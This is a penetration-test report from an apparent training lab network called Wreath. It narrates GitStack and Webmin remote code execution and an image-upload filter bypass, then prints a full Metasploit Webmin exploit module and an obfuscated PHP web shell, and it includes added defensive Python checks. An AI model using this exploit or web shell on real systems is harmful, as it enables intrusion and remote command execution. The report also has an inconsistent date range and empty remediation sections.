
Wreath Network report


Wreath Security Assessment Findings Report

(The following report has been copied and pasted from the report I have produced in Word; if you would like the original, with correct presentation, then drop me a message on any of my socials)

Business Confidential
Date: Aug 22nd, 2022
Project: 1
Version 1.0


Table of Contents

Confidentiality Statement
Disclaimer
Contact Information
Assessment Overview
Assessment Components
External Penetration Test
Finding Severity Ratings
Scope
Scope Exclusions
Client Allowances
Executive Summary
Attack Summary
Security Weaknesses
Multiple Vulnerable Services Employed
Weak Password Policy
Reused Credentials
Vulnerable Privilege Found
Vulnerabilities by Impact
External Penetration Test Findings
Insufficient Patching – GitStack (Critical)
Unrestricted File Upload – ‘/resources/uploads’ (Critical)
Insufficient Patching – Webmin (Critical)
Information Disclosure – Error Page (Low)
Code of Exploits Used
Webmin 1.920 – Unauthenticated Remote Code Execution
Upload Page Obfuscated Payload Used


Confidentiality Statement

This document is the exclusive property of Wreath and JoshLHacking Security (JLHS). This document contains proprietary and confidential information. Duplication, redistribution, or use, in whole or in part, in any form, requires consent of both Wreath and JLHS. JLHS may share this document with auditors under non-disclosure agreements to demonstrate penetration test requirement compliance.

Disclaimer

A penetration test is considered a snapshot in time. The findings and recommendations reflect the information gathered during the assessment and not any changes or modifications made outside of that period. Time-limited engagements do not allow for a full evaluation of all security controls. JLHS prioritized the assessment to identify the weakest security controls an attacker would exploit. JLHS recommends conducting similar assessments on an annual basis by internal or third-party assessors to ensure the continued success of the controls.

Contact Information



Assessment Overview

From Aug 10th, 2022 to Aug 19th, 2019, Wreath contacted JoshLHacking Security to perform a penetration test, and in doing so compare its security infrastructure to current standards. All testing performed is based on the NIST SP 800-115 Technical Guide to Information Security Testing and Assessment, the OWASP Testing Guide (v4), and customized testing frameworks. Phases of penetration testing activities include the following:

· Planning – Customer goals are gathered and rules of engagement obtained.
· Discovery – Perform scanning and enumeration to identify potential vulnerabilities, weak areas, and exploits.
· Attack – Confirm potential vulnerabilities through exploitation and perform additional discovery upon new access.
· Reporting – Document all found vulnerabilities and exploits, failed attempts, and company strengths and weaknesses.

Assessment Components

External Penetration Test

An external penetration test emulates the role of an attacker attempting to gain access to an internal network without internal resources or inside knowledge. A JLHS engineer attempts to gather sensitive information through open-source intelligence (OSINT), including employee information, historical breached passwords, and more that can be leveraged against external systems to gain internal network access. The engineer also performs scanning and enumeration to identify potential vulnerabilities in hopes of exploitation.

Finding Severity Ratings

The following table defines the levels of severity and corresponding CVSS score ranges that are used throughout the document to assess vulnerability and risk impact.

Scope

§ Full scope information provided in “Wreath-1 Full Findings.xslx”

Scope Exclusions

Per client request, JLHS did not perform any Denial of Service attacks during testing.

Client Allowances

Wreath did not provide any allowances to assist the testing.

Executive Summary



Security Weaknesses

Multiple Vulnerable Services Employed

JLHS leveraged multiple successful attacks against Wreath via unpatched versions of services found in use on multiple machines. These included GitStack and MiniServ. Both of these, when exploited, gave JLHS not only remote code execution (RCE) but RCE as root, with no credentials required.

Weak Password Policy

JLHS successfully performed password cracking against most users on the Wreath machines. Passwords such as ‘noodle’ were in use on the network, making it very easy to crack their associated hashes.

Reused Credentials Credentials were reused within Wreath and allowed JLHS to access a subdomain that asked for credentials to view. This ultimately led to the exploitation of Thomas’s Personal PC.

Vulnerable Privilege Found

During the assessment, JLHS managed to gain user-level access to Thomas’s Personal PC. Upon further enumeration of this machine, we found the privilege ‘SeImpersonatePrivilege’ enabled. Even though this escalation path wasn’t taken, this is very dangerous and is better off disabled.

Vulnerabilities by Impact

The following chart illustrates the vulnerabilities found by impact:



External Penetration Test Findings

Insufficient Patching – GitStack (Critical)

Exploitation Proof of Concept

JLHS found a GitStack login portal hosted on port 80 (System - 10.200.81.150). JLHS then attempted to use default credentials for this software; however, the attempt was unsuccessful.

After researching GitStack, there were multiple known exploits available for this software.

(Tool Used – Searchsploit)

JLHS then attempted to use the exploit ‘Gitstack 2.3.10 – Remote Code Execution’, adapting the code to the target machine where necessary. This attempt was successful, as shown below, and gave JLHS remote code execution as nt authority\system.

From this point a PowerShell web shell was inserted into the ‘command’ variable, which enabled a successful reverse shell to be initiated between JLHS and the Windows Server machine.

Remediation

Unrestricted File Upload – ‘/resources/uploads’ (Critical)

JLHS started with an Nmap scan of the machine (10.200.81.100) from the already compromised machine (10.200.81.150). This revealed that ports 80 and 3389 were open on the machine.

With this information, JLHS visited the web page hosted by this machine to reveal the following web page:

JLHS then used a technique called ‘Directory Busting’ to find any hidden directories, which brought back the path ‘/resources’. This path revealed the following code:

JLHS were able to analyze this code to determine that it is the backend code of an image upload web page, and that it has two filters as security measures. Upon further ‘Directory Busting’ the path ‘/resources/index.php’ was discovered by JLHS. This was the image upload web page and was credential protected. However, we were able to reuse credentials found earlier in the pen test to bypass this authorization.

JLHS were able to bypass the upload filters after analysis of the code found under the ‘/resources’ path.

They were able to do this by using a tool called ‘exiftool’ to change the comment of a random JPG image to PHP code that the web page would run. This was successful at bypassing the Image Size Check Filter:

To bypass the Extension Check Filter, JLHS renamed the JPG image with the extension ‘.jpg.php’. This technique takes advantage of the explode() function: the code only looks at the ‘.jpg’ and so ignores the ‘.php’ at the end when verifying whether the image is valid. As you can see below, the upload was successful:

From this, JLHS were able to upload an obfuscated payload (Full code shown at end of document), and gain RCE on Thomas’s Personal PC (10.200.81.100).
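The two filter weaknesses described above, shown as an added example that is not part of the report or of the Wreath application: a check that mirrors explode('.', $name)[1] (only the first extension is inspected) next to a hardened check that validates the final extension, the image magic bytes and the absence of PHP tags in the file body (which is where an EXIF comment would put them). The file names, the sample bytes and the rejection reasons are constructed for this example.

```python
from typing import Tuple

ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}
EXECUTABLE_EXT = {"php", "phtml", "phar", "php5"}
# Magic bytes identifying the image container (constructed lookup table).
MAGIC = {b"\xff\xd8\xff": "jpg", b"\x89PNG\r\n\x1a\n": "png",
         b"GIF87a": "gif", b"GIF89a": "gif"}

def flawed_extension_check(filename: str) -> bool:
    """Mirror of explode('.', $name)[1]: only the first extension is inspected,
    so 'cat.jpg.php' passes even though the server will execute it as PHP."""
    parts = filename.split(".")
    return len(parts) > 1 and parts[1].lower() in ALLOWED_EXT

def hardened_upload_check(filename: str, data: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason): name and content must both look like a plain image."""
    parts = filename.lower().split(".")
    if len(parts) < 2 or "" in parts:
        return False, "missing or empty extension"
    ext = parts[-1]                      # the extension the web server acts on
    if ext not in ALLOWED_EXT:
        return False, f"final extension .{ext} not allowed"
    if EXECUTABLE_EXT & set(parts[1:-1]):
        return False, "executable extension hidden in name"
    kind = next((k for magic, k in MAGIC.items() if data.startswith(magic)), None)
    if kind is None:
        return False, "content is not a recognised image"
    expected = {"jpg", "jpeg"} if kind == "jpg" else {kind}
    if ext not in expected:
        return False, "extension does not match content"
    if b"<?php" in data or b"<?=" in data:   # code smuggled into a comment/EXIF field
        return False, "PHP tag embedded in image"
    return True, "ok"

# Constructed samples: a minimal JPEG whose COM (0xFFFE) segment carries PHP,
# uploaded under a double extension as the report describes, and a clean JPEG.
SHELL_NAME = "cat.jpg.php"
SHELL_DATA = b"\xff\xd8\xff\xfe\x00\x14<?php echo 'x'; ?>\xff\xd9"
CLEAN_NAME = "cat.jpg"
CLEAN_DATA = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\xff\xd9"

if __name__ == "__main__":
    print("flawed check accepts shell:", flawed_extension_check(SHELL_NAME))
    print("hardened check on shell:", hardened_upload_check(SHELL_NAME, SHELL_DATA))
    print("hardened check on clean:", hardened_upload_check(CLEAN_NAME, CLEAN_DATA))
```

Renaming the stored file to a server-generated name and serving the upload directory without script execution would close the remaining gap even if a check is bypassed.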

Remediation


Insufficient Patching – Webmin (Critical)

JLHS started with an initial scan of the system using the network scanning tool Nmap (As shown below).

You can see from the highlighted section that Nmap picked up the exact version of the web server that the machine was hosting on port 10000. Upon further research of this web server version, an exploit for versions 1.890 – 1.920 was found, which gave the attacker RCE when successful.

Exploit used - https://www.exploit-db.com/exploits/47230

JLHS used this exploit, and as a result gained a successful reverse shell as the root user on the CentOS machine, with no credentials required.

Remediation

Additional Reports and Scans (Informational)

Information Disclosure – Error Page (Low)

JLHS started with a scan of the Windows Server machine, utilizing the tool Nmap from the CentOS Machine (10.200.81.200).

This scan provided JLHS with information about the different ports open on the Windows Server machine (10.200.81.150). From here we could visit the web page being hosted, and as a result were directed to a 404 error page (as shown below).

This page disclosed information about 3 subdomains.

Remediation

JLHS provides all clients with all report information gathered during testing. This includes vulnerability scans and a detailed findings spreadsheet. For more information, please see the following documents:

§ WreathNetworkNessus.xls

Code of Exploits Used:

Webmin 1.920 – Unauthenticated Remote Code Execution:

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Webmin 1.920 Unauthenticated RCE',
      'Description'    => %q{
        This module exploits a backdoor in Webmin versions 1.890 through 1.920.
        Only the SourceForge downloads were backdoored, but they are listed as official downloads on the project's site.
        Unknown attacker(s) inserted Perl qx statements into the build server's source code on two separate occasions:
        once in April 2018, introducing the backdoor in the 1.890 release, and in July 2018, reintroducing the backdoor
        in releases 1.900 through 1.920.
        Only version 1.890 is exploitable in the default install. Later affected versions require the expired password
        changing feature to be enabled.
      },
      'Author'         => [
        'AkkuS <Özkan Mustafa Akkuş>' # Discovery & PoC & Metasploit module @ehakkus
      ],
      'License'        => MSF_LICENSE,
      'References'     => [
        ['CVE', '2019-'],
        ['URL', 'https://www.pentest.com.tr']
      ],
      'Privileged'     => true,
      'Payload'        => {
        'DisableNops' => true,
        'Space'       => 512,
        'Compat'      => { 'PayloadType' => 'cmd' }
      },
      'DefaultOptions' => {
        'RPORT'   => 10000,
        'SSL'     => false,
        'PAYLOAD' => 'cmd/unix/reverse_python'
      },
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Targets'        => [['Webmin <= 1.910', {}]],
      'DisclosureDate' => 'May 16 2019',
      'DefaultTarget'  => 0)
    )

    register_options [
      OptString.new('TARGETURI', [true, 'Base path for Webmin application', '/'])
    ]
  end

  def peer
    "#{ssl ? 'https://' : 'http://'}#{rhost}:#{rport}"
  end

  ##
  # Target and input verification
  ##
  def check
    # check passwd change priv
    res = send_request_cgi({
      'uri'     => normalize_uri(target_uri.path, "password_change.cgi"),
      'headers' => { 'Referer' => "#{peer}/session_login.cgi" },
      'cookie'  => "redirect=1; testing=1; sid=x; sessiontest=1"
    })

    if res && res.code == 200 && res.body =~ /Failed/
      res = send_request_cgi({
        'method'  => 'POST',
        'cookie'  => "redirect=1; testing=1; sid=x; sessiontest=1",
        'ctype'   => 'application/x-www-form-urlencoded',
        'uri'     => normalize_uri(target_uri.path, 'password_change.cgi'),
        'headers' => { 'Referer' => "#{peer}/session_login.cgi" },
        'data'    => "user=root&pam=&expired=2&old=AkkuS%7cdir%20&new1=akkuss&new2=akkuss"
      })
      if res && res.code == 200 && res.body =~ /password_change.cgi/
        return CheckCode::Vulnerable
      else
        return CheckCode::Safe
      end
    else
      return CheckCode::Safe
    end
  end

  ##
  # Exploiting phase
  ##
  def exploit
    unless Exploit::CheckCode::Vulnerable == check
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
    end

    command = payload.encoded
    print_status("Attempting to execute the payload...")
    handler

    res = send_request_cgi({
      'method'  => 'POST',
      'cookie'  => "redirect=1; testing=1; sid=x; sessiontest=1",
      'ctype'   => 'application/x-www-form-urlencoded',
      'uri'     => normalize_uri(target_uri.path, 'password_change.cgi'),
      'headers' => { 'Referer' => "#{peer}/session_login.cgi" },
      'data'    => "user=root&pam=&expired=2&old=AkkuS%7c#{command}%20&new1=akkuss&new2=akkuss"
    })
  end
end

Upload Page Obfuscated Payload Used:

<?php $p0=$_GET[base64_decode('d3JlYXRo')];if(isset($p0)){echo base64_decode('PHByZT4=').shell_exec($p0).base64_decode('PC9wcmU+');}die();?>
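For triage of files like the upload payload above, an added example (not part of the report): it decodes the base64_decode('...') literals the payload uses to hide its strings and reports the command-execution sinks and request sources the decoded form reveals. The sink and source lists are assumptions chosen for this example; the payload string is the one quoted in the report.

```python
import base64
import re
from typing import Dict, List

# base64_decode('<literal>') calls with a single-quoted standard-alphabet argument.
B64_CALL = re.compile(r"base64_decode\(\s*'([A-Za-z0-9+/=]+)'\s*\)")
# Assumed watch-lists for this example: execution sinks and request-controlled sources.
SINKS = ("shell_exec", "system", "exec", "passthru", "eval", "popen", "proc_open")
SOURCES = ("$_GET", "$_POST", "$_REQUEST", "$_COOKIE")

def deobfuscate(php: str) -> str:
    """Replace each base64_decode('...') call with its decoded string literal."""
    def _sub(m):
        try:
            text = base64.b64decode(m.group(1), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            return m.group(0)            # leave undecodable literals untouched
        return "'" + text.replace("'", "\\'") + "'"
    return B64_CALL.sub(_sub, php)

def triage(php: str) -> Dict[str, List[str]]:
    """Report the decoded literals plus any sinks and sources visible after decoding."""
    clear = deobfuscate(php)
    return {
        "decoded": [base64.b64decode(b).decode("utf-8", "replace") for b in B64_CALL.findall(php)],
        # \b keeps 'exec' from matching inside 'shell_exec'
        "sinks": [s for s in SINKS if re.search(r"\b" + re.escape(s) + r"\s*\(", clear)],
        "sources": [s for s in SOURCES if s in clear],
    }

# The obfuscated upload payload quoted in the report, embedded here as the sample input.
PAYLOAD = ("<?php $p0=$_GET[base64_decode('d3JlYXRo')];if(isset($p0)){"
           "echo base64_decode('PHByZT4=').shell_exec($p0).base64_decode('PC9wcmU+');}die();?>")

if __name__ == "__main__":
    print(deobfuscate(PAYLOAD))
    print(triage(PAYLOAD))
```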

©2022 by Hack The Box Write-Ups By Josh Lees
